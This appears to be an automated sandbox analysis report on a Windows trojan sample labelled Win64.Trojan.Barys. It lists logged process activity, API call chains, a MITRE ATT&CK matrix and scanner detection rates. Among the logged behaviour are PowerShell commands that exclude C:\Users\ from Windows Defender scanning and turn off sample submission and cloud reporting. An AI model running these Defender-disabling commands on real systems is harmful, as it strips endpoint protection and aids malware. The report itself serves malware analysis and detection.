Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBA292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,

6_2_00007FF66EBA292E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Code function: 6_2_00007FF66EBA6FD5 GetSystemTimeAsFileTime,

6_2_00007FF66EBA6FD5

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 24_2_00007FFDA5576DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

24_2_00007FFDA5576DA3

Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: f8ff311483bvmdq2bvv.exe, 00000006.00000002.2162992393.00000239A82A8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55758DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	24_2_00007FFDA55758DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55AAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	24_2_00007FFDA55AAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA55D1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	24_2_00007FFDA55D1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5BA28BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	24_2_00007FFDA5BA28BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5BBB820 listen,htons,recv,select,	24_2_00007FFDA5BBB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDA5BBB7E8 bind,	24_2_00007FFDA5BBB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC0F418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	24_2_00007FFDAC0F418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 24_2_00007FFDAC1215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	24_2_00007FFDAC1215FA

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 Network Sniffing	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Create Account	2 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Service Execution	2 Valid Accounts	4 Windows Service	1 Timestomp	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	4 Windows Service	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Network Sniffing	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 File Deletion	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	1 Network Share Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	131 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Access Token Manipulation	/etc/passwd and /etc/shadow	31 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	1 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Users	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Services File Permissions Weakness	GUI Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	100%	Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	67%	ReversingLabs	Win64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe	42%	ReversingLabs	Win64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe	3%	ReversingLabs
C:\Windows\Temp\459WBsWA	0%	ReversingLabs
C:\Windows\Temp\CheAuE4k	0%	ReversingLabs
C:\Windows\Temp\LL369bff	0%	ReversingLabs
C:\Windows\Temp\OKh5fbg5	0%	ReversingLabs
C:\Windows\Temp\SCKoP3sQ	0%	ReversingLabs
C:\Windows\Temp\ZNdEbgqy	0%	ReversingLabs
C:\Windows\Temp\m28TQ56q	0%	ReversingLabs
C:\Windows\Temp\nVYOsq5a	0%	ReversingLabs
C:\Windows\Temp\o1i2PUnI	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
reseed.memcpy.io	2%	Virustotal		Browse
